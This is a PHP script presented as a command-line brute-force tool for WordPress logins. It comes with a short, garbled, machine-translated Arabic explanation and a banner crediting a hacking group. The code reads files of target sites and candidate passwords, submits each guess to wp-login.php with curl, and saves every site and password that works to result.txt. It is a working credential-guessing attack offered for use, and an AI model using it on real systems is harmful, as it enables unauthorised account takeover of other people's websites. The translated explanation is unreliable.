Brute WP

1.  
2. تنفجر = لترتيب النتائج
3.  
4. file_get_contents = لجلب محتوى
5. pass.txt + sites.txt
6.  
7. ===================
8.  
9. foreach ($ شبكات ك $ الويب)
10.  
11. (تمرير دولار $ كلمة المرور) foreach
12.  
13. حلقه لتكرار المصفوفه داخل ال TXT
14.  
15. ===================
16.  
17. تقليم = لأزاله الفراغات من اول النص واخره في ملف pass.txt
18.  
19. إذا (eregi ('upload.php'، $ X3)) = للتحقق اذا تم دخول
20.  
21. اللوحه سيجد upload.php
22.  
23. وفي الاسفل فانكشن التخمين
24.  
25.  
26.  
27.  
28.  
29.  
30.  
31.  
32.  
33.  
34. -----------------Code Start Here--------------
35. <?php
36. print_r("\r\n\r\n
37. ______ _ _ _ _
38. | ___ \ | | | | | | | |
39. | |_/ /_ __ _ _| |_ ___ | | | | ___ _ __ __| |_ __ _ __ ___ ___ ___
40. | ___ \ '__| | | | __/ _ \ | |/\| |/ _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
41. | |_/ / | | |_| | || __/ \ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \
42. \____/|_| \__,_|\__\___| \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/
43.  
44. [+]-------------------------------------------[+]
45. [+] Coder By : Lov3rDns [+]
46. [+] Title : Brute Force Wordpress By x3 [+]
47. [+] Group : x3 [+]
48. [+] Homepage : is-sec.com - Groupx3.org [+]
49. [+] 4U : Mr.Dm4r - xSecurity - Shark Hidden [+]
50. [+]-------------------------------------------[+]
51. [*] Usage : php {$argv[0]} sites.txt admin pass.txt\r\n\r\n");
52.  
53. $sitel = $argv[1];
54. $username = $argv[2];
55. $passl = $argv[3];
56.  
57. $webs = explode("\n", file_get_contents($sitel));
58. $pass = explode("\n", file_get_contents($passl));
59.  
60. print "############ START BRUTING ############\r\n";
61. foreach($webs as $web)
62. {
63. $web = @trim($web);
64. print "[+] Target -> {$web}\r\n[+] Trying Passwords..\r\n";
65. foreach($pass as $password)
66. {
67. $password = @trim($password);
68. $x3 = brute($web,$username,$password);
69. if(eregi('upload.php', $x3))
70. {
71. print "[+] Site: {$web}\r\n[+] Username: {$username}\r\n[+] Password: {$password}\r\n";
72. $f = fopen('result.txt', 'a+');
73. $source = "[+] Site: {$web}\r\n[+] Username: {$username}\r\n[+] Password: {$password}\r\n";
74. fwrite($f,$source);
75. }
76. }
77. }
78. print "############ END ############\r\n";
79.  
80. function brute($web,$username,$password)
81. {
82. $curl = curl_init();
83. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
84. curl_setopt($curl,CURLOPT_POST,TRUE);
85. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
86. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
87. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
88. curl_setopt($curl,CURLOPT_URL,"{$web}/wp-login.php");
89. curl_setopt($curl,CURLOPT_POSTFIELDS,"log={$username}&pwd={$password}&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1");
90. $brute = curl_exec($curl);
91. return $brute;
92. }
93.  
94. print_r("\r\n\r\n
95. [+]-----------------------------------------------------------------[+]
96. Brute Force Wordpress Command Line By x3
97. Coder By Lov3rDns
98. www.lov3rphp.wordpress.com
99. ./x3
100. [+]-----------------------------------------------------------------[+]
101. ");
102. ?>